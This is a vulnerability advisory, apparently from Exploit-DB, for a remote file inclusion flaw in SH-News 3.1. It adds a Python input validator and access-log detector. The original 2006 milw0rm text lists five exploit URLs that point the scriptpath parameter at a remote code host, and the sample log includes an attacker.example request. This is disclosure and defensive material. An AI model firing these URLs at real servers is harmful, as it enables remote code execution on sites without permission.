Vendor: SH-News
By: v1per-haCker
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: SH-News
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:sh-news:sh-news
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SH-News (RFI)

SH-News contains a Remote File Inclusion (RFI) vulnerability. An attacker can exploit it by supplying a URL in the scriptpath parameter of the affected scripts, which causes the server to include the remote file and lets the attacker execute arbitrary code on the vulnerable server.

Mitigation:

Disable remote file inclusion, validate user input, and use a web application firewall.
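The following is an added example, not code from the advisory or from SH-News: a Python allow-list validator for the scriptpath value (the input-validation mitigation above) together with a detector that scans access-log lines for requests to the five scripts the advisory lists whose scriptpath value would be treated as a remote stream or a traversal by include(). The log lines, hosts and base directory are constructed placeholders.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory lists as accepting the scriptpath parameter.
AFFECTED_SCRIPTS = {"report.php", "archive.php", "comments.php", "init.php", "news.php"}

# Constructed sample access-log lines (combined log format); hosts are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Oct/2006:12:00:00 +0000] "GET /path/report.php?scriptpath=http://attacker.example/x.txt? HTTP/1.1" 200 512',
    '10.0.0.6 - - [11/Oct/2006:12:00:01 +0000] "GET /path/news.php?scriptpath=includes HTTP/1.1" 200 1024',
    '10.0.0.7 - - [11/Oct/2006:12:00:02 +0000] "GET /path/news.php?scriptpath=%68ttp%3A%2F%2Fx.test%2Fs.txt%3F HTTP/1.1" 200 33',
]


def scriptpath_is_remote(value):
    """True if include() would resolve the value through a stream wrapper
    (http://, ftp://, php://, data:, //host) or escape the app directory."""
    v = unquote(value).strip()  # parse_qs decoded once; also catch double-encoding
    if re.match(r"[a-z][a-z0-9+.\-]*:", v, re.I) or v.startswith("//"):
        return True
    if "\0" in v or ".." in v.replace("\\", "/").split("/"):
        return True
    return False


def safe_scriptpath(value, base_dir="/var/www/shnews"):
    """Allow-list replacement for the raw parameter: accept only a bare
    directory name resolved under base_dir; None means reject the request."""
    if not re.fullmatch(r"[A-Za-z0-9_\-]+", value):
        return None
    return posixpath.join(base_dir, value)


def flag_rfi_requests(log_lines):
    """Return (script, value) for requests to an affected script whose
    scriptpath looks remote; for hunting exploitation attempts in logs."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        script = parts.path.rsplit("/", 1)[-1]
        if script not in AFFECTED_SCRIPTS:
            continue
        for val in parse_qs(parts.query).get("scriptpath", []):
            if scriptpath_is_remote(val):
                hits.append((script, val))
    return hits
```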

Exploit-DB raw data:

#==================================================================
#  SH-News (RFI)
#==================================================================
# Info:-
#
# Scripts:  SH-News
# Download: http://www.hotscripts.com/jump.php?listing_id=19561&jump_type=1
# Version : 3.1
# Dork & vuln : download scripts and think :)
# Note : The vuln not tested on other version :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/report.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/archive.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/comments.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/init.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/news.php?scriptpath=http://EvElCoDe.txt?
#
#==================================================================
#Discovered By : v1per-haCker
#
#Contact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hitler_jeddah ; BooB11 ; FaTaL ;
#            ThE-WoLf-KsA ; mohandko ; fooooz ; maVen ; fucker_net ;
#            metoovet
#and all members in XP10_hackEr Team
#thanx to str0ke :)
#WWW.XP10.COM
===================================================================

# milw0rm.com [2006-10-11]